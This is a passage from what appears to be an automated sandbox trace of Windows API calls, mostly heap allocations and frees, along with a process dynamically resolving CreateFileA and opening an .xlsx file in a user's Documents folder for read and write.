Size=0x4) returned 0x8e1890 [0175.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0175.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0175.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0175.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0175.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0175.984] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.984] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0175.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0175.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0175.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.985] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0175.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0175.985] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd390 [0175.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd390, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0175.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.986] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0175.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0175.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0175.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0175.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0175.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd390, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0175.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.986] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0175.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0175.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.986] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0175.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0175.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0175.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0175.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3f) returned 0x8db0a8 [0175.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx", cchWideChar=63, lpMultiByteStr=0x8db0a8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx", lpUsedDefaultChar=0x0) returned 63 [0175.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0175.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.987] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oshjnd6e0l0zqq8nt.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0175.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0175.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0175.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0175.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0175.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0175.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0175.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0175.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0175.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0175.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0175.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=63, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0175.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7e) returned 0x9c0c88 [0175.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=63, lpWideCharStr=0x9c0c88, cchWideChar=63 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.xlsx") returned 63 [0175.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0175.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0175.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0175.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0175.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0175.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0175.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0175.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0175.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0175.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0175.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0175.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0175.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0175.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0175.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0175.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0175.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0175.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0175.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0175.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0175.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0175.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0175.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0175.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0175.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0175.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0175.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0175.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0175.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0175.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0175.994] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0175.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0175.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0175.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0175.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0175.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0175.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0175.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.996] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0175.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0175.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0175.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0175.996] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0175.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0175.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0175.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: 